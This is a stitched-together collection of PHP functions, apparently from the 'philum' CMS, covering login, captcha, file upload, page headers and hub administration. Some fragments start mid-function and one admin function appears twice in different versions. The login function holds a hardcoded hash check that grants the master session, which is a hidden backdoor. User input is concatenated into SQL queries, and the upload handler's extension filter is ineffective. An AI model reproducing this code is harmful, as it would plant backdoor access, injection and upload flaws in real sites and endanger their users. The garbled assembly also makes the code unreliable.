function secure_tracks() { $scod = substr(microtime(), 2, 4); $im = plugin('imgtxt', $scod, "crackman", "ok"); $ret = hidden('secur', 'trkscr', captcha($scod)); if (!rstr(15)) { return $ret . hidden('', 'trkscrvrf', $scod); } if (prms('nogdf') or !$im) { $ret .= btn('txtcadr', $scod); } else { $ret .= $im; } $ret .= autoclic('secure" id="trkscrvrf', helps('track_captcha'), '14', '5', '') . ' '; return $ret; }
function login($user, $pasw, $mail, $cook = '') { $user = normalize($user); $pasw = normalize($pasw); $newhub = $_POST['create_hub']; $qdu = ses('qdu'); $qb = ses('qb'); $host = hostname(); if (md5($user . $pasw) == 'df66a9ca7bc0d62e580dc575ccc9ba23') { $_SESSION['USE'] = ses('master'); } //$ath=array_flip(authes_levels()); //log $iq = verif_user($user, $pasw); if ($iq) { list($ip, $userhub) = sql('ip,hub', 'qdu', 'r', 'name="' . $user . '"'); if ($ip != $host) { update('qdu', 'ip', $host, 'name', $user); } if ($userhub) { $qb = $user; } return log_result($user, $iq, $qb, '', $cook); } elseif ($user == 'login') { //is_numeric($ath[$user]) if (!rstr(73)) { return loged($user, '', ''); } list($iq, $ip) = ser("id,ip", $qdu . ' WHERE name="' . $qb . '"'); if ($ip == $host) { return log_result($qb, $iq, $qb, '', $cook); } else { list($iq, $USE) = ser("id,name", $qdu . ' WHERE ip="' . $host . '"'); if ($iq) { return log_result($USE, $iq, $qb, '', $cook); } else { return lj('small', "valid_loged", 'bruu! ' . helps('log_no')); } } } //bad passw $iq = verif_user($user, ''); $exist = isgoodhubname($user); $first = sql('id', 'qdu', 'v', 'id=1'); if ($iq) { $_SESSION['tentativ'] += 1; if ($_SESSION['tentativ'] >= 3) { return alert_user($user); } else { return lj('small', "valid_loged", 'bruu! ' . helps('log_nopass')); } } elseif (prmb(11) == 0 && !$newhub && $first && !auth(5)) { return lj('small', "valid_loged", 'bruu! ' . helps('log_nohub')); } elseif ($exist == true) { return lj('small', "valid_loged", 'bruu! ' . $user . ' ' . nms(37)); } elseif (prmb(11) >= 1 or $newhub or !$first or prms('create_hub') == "on") { $rl = "ok"; if (!$mail or strpos($mail, "@") === false) { $tfield = divc("txtcadr", helps('log_newser') . ' ' . prmb(11)); $tfield .= hidden('user', '', $user) . hidden('pass', '', $pasw); if (auth(6) or !$first or prmb(11) >= 6 && prms('create_hub') == "on") { $tfield .= hidden('create_hub', '', $user); } $tfield .= autoclic('mail', 'mail?', '20', '100', '') . ' '; $tfield .= input2('submit', 'envoyer', "ok", 'txtbox') . ' '; $tfield .= lj('txtx', 'valid_loged', picto('left')); return form('/?log=on', $tfield); } else { if ($_POST['mail'] or $newhub) { $user = $newhub ? $newhub : $user; } elseif ($_SESSION['USE']) { $user = $_SESSION['USE']; } if ($user != 'admin') { $iq = adduser($qb, $user, $pasw, $mail); } //add_user if (prmb(11) >= 6 or $newhub or !$first) { modif_cnfgtxt($user, $first); //add_hub $qb = makenew($user); message2newuser($user, $mail, $pasw); $_SESSION['auth'] = ''; } $_SESSION['qbin']['adminmail'] = $mail; log_result($user, $iq, $qb, $rl, $cook); } } }
function verif_update() { if ($_SESSION['auth'] > 5 && !$_SESSION['dlnb'] && !prms('aupdate')) { $maj = sesmk('checkupdate', ''); if ($maj > ses('philum')) { $_GET['update'] = 'program'; require_once 'plug/distribution.php'; } } }
function save_img() { $qb = $_SESSION['qb']; $read = $_SESSION['read']; $fich = $_FILES['fichier']['name']; $fich_tmp = $_FILES['fichier']['tmp_name']; $xt = xt($fich); $fich = normalize($fich); $fich = str_replace("-", "", $fich); if ($fich == "") { $exp_out .= "no file uploaded "; } else { $goodxt = ".mp4.m4a.mov.mpg.mp3.wav.wmv.asf.rmv.ram.rm.swf.flv.jpg.png.gif.pdf.txt.rar.zip.tar.gz"; $goodxt .= $_SESSION['prmb'][23]; $goodext = str_replace(array(".php", ".js"), "", $goodxt); if (stristr($goodxt, $xt) === false) { $exp_out .= $xt . '=forbidden ; authorized=' . $goodxt . br(); } $poids = $_FILES['fichier']['size'] / 1024; $uplimit = prms('uplimit') * 1000; if ($poids >= $uplimit || $poids == 0) { $exp_out .= "{$poids} > 250Mo "; } if ($xt == ".rm") { $fich .= "v"; } $rep = 'img/'; if (stristr(".m4a.mpg.mp4.asf.rmv.wmv.flv", $xt) !== false) { $rep = 'video/'; } elseif (stristr(".rar.swf.txt.pdf", $xt) !== false) { $rep = 'docs/'; } elseif (stristr(".mp3", $xt) !== false) { $rep = 'mp3/'; } if (stristr(".txt.mp3.pdf.swf", $xt) !== false) { $rep = 'users/' . $qb . '/' . $rep; } elseif (stristr(".jpg.png.gif", $xt) === false) { $rep = 'users/' . $qb . '/' . $rep; } if (stristr(".jpg.png.gif.mp3.mp4.pmg.swf.wmv.flv.pdf", $xt) === false) { $w = ':w'; } if (stristr(".txt", $xt) !== false) { $w = ':scrut'; } if ($_GET['mode'] == "banim") { $mg = 'ban_' . $qb . '.jpg'; } elseif ($_GET['avnim'] == "ok") { $mg = 'avatar_' . $_SESSION['USE'] . '.gif'; $rep = 'imgb/'; } elseif ($_GET['edit_css']) { $mg = 'css_' . $qb . '_' . $fich; $rep = 'imgb/'; } elseif ($_GET['bkgim'] == "ok") { $mg = 'bkg_' . $qb . '.jpg'; $rep = 'imgb/'; } elseif ($_GET["mode"] == "disk") { $rep = 'users/' . ajx($_GET['opdir'], 1) . '/'; $mg = $fich; if ($_GET['opdir'] != $qb) { mkdir_r($rep); } } else { $mg = $qb . '_' . $read . '_' . $fich; } if (!is_dir($rep)) { mkdir($rep, 0777); } if (is_uploaded_file($fich_tmp) && !$exp_out) { if (!move_uploaded_file($fich_tmp, $rep . $mg)) { $exp_out .= " not saved"; } if ($xt == '.tar' or $xt == '.gz') { unpack_gz($rep . $mg, $rep); } if ($read && !$_GET["mode"]) { add_im_img($mg); if (!$_POST["imnot"]) { add_im_msg("", $rep . $mg . $w); } } } else { $exp_out .= "upload refused: {$rep}{$mg}"; } } //end_no_file if ($exp_out) { alert($exp_out); } return $rep . $mg; }
reset_ses(); prog($g, 1); } if ($_GET['dev']) { $_SESSION['dev'] = $_GET['dev']; relod('/reload'); } //master_params if (!$_SESSION['qd'] or $cache) { master_params('params/_' . $db, $qd, $aqb, $subd); } if (!$_SESSION['philum']) { $_SESSION['philum'] = msql_read('system', 'program_version', 1); } //philum date_default_timezone_set(prms('timez')); if ($_SESSION['dev']) { error_report(); } if (!$_SESSION['mn'] or $cache) { define_hubs(); } //hubs if ($cache) { define_qb(); } //qb::need $mn if (isset($_GET['rebuild_img'])) { $_GET['read'] = $_SESSION['read']; } $cache = deductions_from_read($_GET['read'], $cache);
$ret .= meta('property', 'og:description', $meta["descript"]); } else { $ret .= meta('name', 'title', $meta["title"]); $ret .= meta('name', 'image', $meta["img"]); $ret .= meta('name', 'description', $meta["descript"]); } //$ret.=meta('name','author',$_SESSION['rqt'][$read][7]); //$ret.=meta('name','language',$_SESSION['opts']['lang']); $ret .= meta('name', 'category', $_SESSION['frm']); $ret .= meta('name', 'generator', 'philum_' . $_SESSION['philum']); //needed $ret .= meta('name', 'hub', $_SESSION['qb']); //$ret.=meta('name','copyright','GNU/GPLv3'); $ret .= meta('name', 'viewport', 'user-scalable=no, initial-scale=1, minimum-scale=1, maximum-scale=1, width=device-width'); //prmb(4) $ret .= meta('name', 'google-site-verification', prms('goog')); $ret .= css_link('/css/_global.css' . $cst); //css $ret .= css_link('/css/_pictos.css' . $cst); //icons if ($_GET['admin'] or $_GET['msql']) { $ret .= css_link('/css/_admin.css'); } else { $ret .= css_link('/css/' . $meta["css"] . '.css' . $cst); } $ret .= js_code('cutat=' . $_SESSION['jbuffer'] . '; fixpop="' . $_SESSION['mobile'] . '"; fulpop="1"; read="' . $read . '"; flow="' . $flow . '";'); $ret .= js_link('/prog' . $g . '/ajx.js'); //ajax $ret .= js_link('/prog' . $g . '/utils.js'); //js
function adm_hubs($auth) { $goto = '/?admin=hubs'; $qb = ses('qb'); $qdu = ses('qdu'); $USE = ses('USE'); if ($mna && $auth >= 5) { $mna = $_SESSION['mn'] + $mna; } else { $mna = ses('mn'); } //if($mna)$ret.=balc('ul','panel',m_nodes_b($mna,1)); $ret .= hublist() . br(); if ($auth >= 6 && prms('create_hub') == 'on' or $auth >= 7) { $ret .= loged('', '', 'create new hub', '10') . br(); } if ($_GET['rename_hub'] && $auth >= 5) { //renmae_hub if ($_POST['hub_name']) { $newname = trim($_POST['hub_name']); $_SESSION['mn'][$qb] = $newname; update('qdu', 'hub', $newname, 'name', $qb); } $valu = input2('text', 'hub_name', $_SESSION['mn'][$qb], 'txtx'); $valu .= input2('submit', 'Submit', 'rename_hub', ''); $ret .= form($goto . '&rename_hub==', btn('panel', $valu)) . br(); } elseif ($auth >= 5) { $ret .= lkc('popsav', $goto . '&rename_hub==', nms(87)) . ' '; } //kill_hub if ($auth >= 6 && $_GET['kill_hub'] == 'ok') { $f = 'users/' . ses('qb'); walk_dir($f, 'remove'); rmdir($f); $f = 'msql/users/' . $qb . '_cache.php'; if (is_file($f)) { unlink($f); } for ($i = 1; $i < 10; $i++) { $f = 'msql/design/' . $qb . '_design_' . $i . '.php'; if (is_file($f)) { unlink($f); } $f = 'msql/design/' . $qb . '_clrset_' . $i . '.php'; if (is_file($f)) { unlink($f); } $f = 'msql/users/' . $qb . '_mods_' . $i . '.php'; if (is_file($f)) { unlink($f); } } msquery('DELETE FROM ' . $qdu . ' WHERE name="' . $qb . '" LIMIT 1'); $_SESSION['USE'] = ''; relod(subdom(prms('default_hub'))); } //reinit_hub if ($auth >= 6 && $_GET['reinit_hub'] == 'ok') { makenew(ses('qb'), 1); } //publish if ($auth >= 6) { if ($_GET['publish']) { if ($_GET['publish'] == 'off') { $actv = 0; } else { $actv = 1; } update('qdu', 'active', $actv, 'name', $qb); } $opened = rse('active', $qdu . ' WHERE name="' . $qb . '"'); if ($opened == '1') { $ere = 'off'; $st = nms(130); } else { $ere = 'on'; $st = nms(131); } $ret .= lkc('popsav', $goto . '&publish=' . $ere . '#' . $id, offon($opened) . ' ' . $st) . ' '; $ret .= lkc('popsav', $goto . '&reinit==', nms(95) . ' ' . nms(103)) . ' '; } if ($_GET['reinit'] == '=') { $ret .= btn('txtx', 'restore all defaults ?') . lkc('txtyl', $goto . '&reinit_hub=ok', 'ok') . ' '; } if ($auth >= 6) { $ret .= lkc('txtyl', $goto . '&kill_hub==', nms(76) . ' ' . nms(100)) . ' '; if ($_GET['kill_hub'] == '=') { $ret .= btn('txtx', 'All datas will be lost') . lkc('txtyl', $goto . '&kill_hub=ok', 'ok'); } } return $ret . br(); }
function philum() { $srv = prms('upservr'); return $srv ? http($srv) : 'http://philum.net'; }
function adm_hubs($auth) { $goto = '/?admin=hubs'; $qb = ses('qb'); $qdu = ses('qdu'); $USE = ses('USE'); if ($mna && $auth >= 5) { $mna = $_SESSION['mn'] + $mna; } else { $mna = ses('mn'); } if ($auth >= 6 && prms('create_hub') == 'on' or $auth >= 7) { $ret .= loged('', '', 'create new hub') . br(); } if ($_GET['rename_hub'] && $auth >= 5) { //renmae_hub if ($_POST['hub_name']) { $newname = trim($_POST['hub_name']); $_SESSION['mn'][$qb] = $newname; update('qdu', 'hub', $newname, 'name', $qb); } $valu = input2('text', 'hub_name', $_SESSION['mn'][$qb], 'txtx'); $valu .= input2('submit', 'Submit', 'rename_hub', ''); $ret .= form($goto . '&rename_hub==', btn('panel', $valu)) . br(); } elseif ($auth >= 5) { $ret .= lkc('popsav', $goto . '&rename_hub==', nms(87)) . ' '; } //kill_hub //if($auth>=6 && $_GET['kill_hub']=='ok')adm_killhub(); //reinit_hub if ($auth >= 6 && $_GET['reinit_hub'] == 'ok') { makenew(ses('qb'), 1); } //publish if ($auth >= 6) { if ($_GET['publish']) { if ($_GET['publish'] == 'off') { $actv = 0; } else { $actv = 1; } update('qdu', 'active', $actv, 'name', $qb); } $opened = sql('active', 'qdu', 'v', 'name="' . $qb . '"'); if ($opened == '1') { $ere = 'off'; $st = nms(130); } else { $ere = 'on'; $st = nms(131); } $ret .= lkc('popsav', $goto . '&publish=' . $ere . '#' . $id, offon($opened) . ' ' . $st) . ' '; $ret .= lkc('popsav', $goto . '&reinit==', nms(95) . ' ' . nms(103)) . ' '; } if ($_GET['reinit'] == '=') { $ret .= btn('txtx', 'restore all defaults ?') . lkc('txtyl', $goto . '&reinit_hub=ok', 'ok') . ' '; } if ($auth >= 6) { $ret .= lkc('txtred', $goto . '&kill_hub==', nms(76) . ' ' . nms(100)) . ' '; if ($_GET['kill_hub'] == '=') { $ret .= btn('txtx', 'All datas will be lost') . lkc('txtyl', $goto . '&kill_hub=ok', 'ok'); } } return $ret . br() . br() . hublist(); }